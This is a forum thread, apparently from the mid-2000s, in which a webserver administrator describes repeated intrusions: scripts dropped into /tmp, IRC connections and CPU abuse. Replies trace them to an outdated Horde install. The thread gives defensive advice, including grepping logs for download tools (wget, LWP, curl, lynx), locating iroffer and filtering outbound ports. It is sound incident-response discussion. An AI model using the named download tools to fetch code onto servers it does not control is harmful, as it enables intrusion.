Hey -

I have a fairly busy webserver, with a secured /tmp directory:



however once in a while (becoming more frequently) a script seems to get itself running and typically connects as an icrd and runs some inane command which uses up the CPU.

After I find this I always run the rootkit scans and ls -la the /tmp directories. I often find a dirctory with some scripts in and so I delete them and then grep through domlogs looking for one of the following:

wget, LWP or Simple (and not 404)

Now, wget is pretty secure:



But today a command was running, from perl:



This was connected on ircd but I can't find anything on the server that indicates how the script was running. I updated phpBB, which was running 2.0.18 and will see if that stops the problem but does anyone have any tips on trying to stop this sort of breach occurring?

Should I be more worried other than the annoyance of these scripts if my /tmp dir is secured?

Is it possible to firewall off ircd outbound connections?

Any ideas would be gratefully received!

answer was insecure version of Horde and curl incidentally

Glad to hear you got that sorted out, I noticed you stated that it was running an IRCD or a port that uses IRC, this is pretty broad, but alot of times I found that people use the same scripts and dont rename stuff

run this:
updatedb; locate iroffer

Alot of times people that do this use Iroffer, its pretty simple to use from what I've seen, examine the conf file they uploaded to see where else they may have tried or have uploaded stuff to your box.

A firewall like APF thats filtering outbound traffic would definitly slow this down. Only allow outbound the ports you need.

Also note, alot of people use "curl" or "lynx" to get stuff on your box, wget isnt the only one which im sure you know . Hope this helps .

The script i found was temp2006

http://www3.ca.com/securityadvisor/virusin...s.aspx?id=47980

but it appears to able to be deployed, at least partially, in Horde < 3.1.1 - you might notice the bright banner on their homepage (which has only just turned redish!)

http://cvs.horde.org/horde/services/help/index.php

I think that looks like where my problems where coming from eval() :!:

Any other tips for finding the culprit? So far he hasn't been able to run his application, but somehow he's managing to upload stuff onto my /tmp folder. I know what user he's uploading as (have suexec and phpsuexec running) but checking domlogs, access_log and error_log hasn't given me a clue yet. (checked timestamp of the file he last uploaded)